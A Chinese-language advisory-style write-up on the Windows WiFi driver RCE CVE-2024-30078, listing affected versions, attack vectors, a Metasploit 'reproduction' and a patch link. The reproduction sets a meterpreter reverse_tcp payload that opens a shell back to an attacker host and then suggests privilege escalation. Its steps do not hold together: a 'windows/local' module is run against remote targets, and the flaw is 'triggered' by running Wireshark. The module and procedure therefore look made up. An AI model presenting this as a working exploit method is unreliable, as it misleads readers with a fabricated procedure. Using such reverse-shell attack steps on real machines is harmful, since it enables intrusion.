Windows WiFi 驱动程序远程代码执行漏洞(CVE-2024-30078)
漏洞描述
此漏洞与WiFi驱动程序相关,允许攻击者在同一WiFi网络下远程执行代码,且这一过程不需要用户的任何交互。这意味着如果用户在公共场所,如机场、咖啡店或办公环境中使用受影响的设备连接到WiFi,设备可能会面临安全风险。
影响范围
Microsoft-Windows 10 1809
Microsoft-Windows Server 2012
Microsoft-Windows Server 2019
Microsoft-Windows 10 1607
Microsoft-Windows Server 2022
Microsoft-Windows 10 1507
version<10.0.10240.20680,version<10.0.14393.7070,version<10.0.17763.5936,version<10.0.19044.4529,version<10.0.19045.4529,version<10.0.22000.3019,version<10.0.22621.3737,version<10.0.22631.3737,version<10.0.14393.7070,version<10.0.17763.5936,version<10.0.20348.2522,version<10.0.25398.950受影响。
Microsoft-Windows 10 22h2
Microsoft-Windows 11 Version 21H2
Microsoft-Windows Server 2016
Microsoft-Windows Server 2008
Microsoft-Windows 10 21h2
Microsoft-Windows 11 Version 22H2
Microsoft-Windows 11 23h2
Microsoft-Windows Server 2022 23h2
Microsoft-Windows 11
Microsoft-Windows 10
漏洞利用过程
攻击者可能通过以下方式利用该漏洞:
- 创建恶意网络,引诱用户连接,然后利用漏洞执行远程代码。
- 利用中间人攻击(MITM)来截获和修改网络流量。
- 利用附近的无线接入点(AP)来传播恶意代码。
复现过程
- 环境准备
准备Windows操作系统并且已经安装了WiFi驱动程序。
安装Wireshark,捕获网络流量。
kali操作系统的Metasploit。 - 配置Metasploit。设置Metasploit为监听模式,并指定攻击载荷和目标IP地址,并启动监听器
use exploit/windows/local/cve_2024_30078_wifi_driver_rce
set LHOST <你的本地IP地址>
set RHOSTS <目标设备的IP地址>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT <你的本地监听端口>
exploit
-
触发漏洞:
使用Wireshar监听目标设备上的网络流量,并尝试连接到目标设备的WiFi网络。 -
检测漏洞利用:
在Metasploit控制台中看到一个新的会话已建立,表示漏洞已被成功利用。如果没有新的会话,需要调整Metasploit的配置或尝试不同的攻击向量。 -
提升权限:
如果成功建立了会话,可以尝试提升权限,可执行任意命令。
漏洞修复
目前官方已修复此漏洞:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078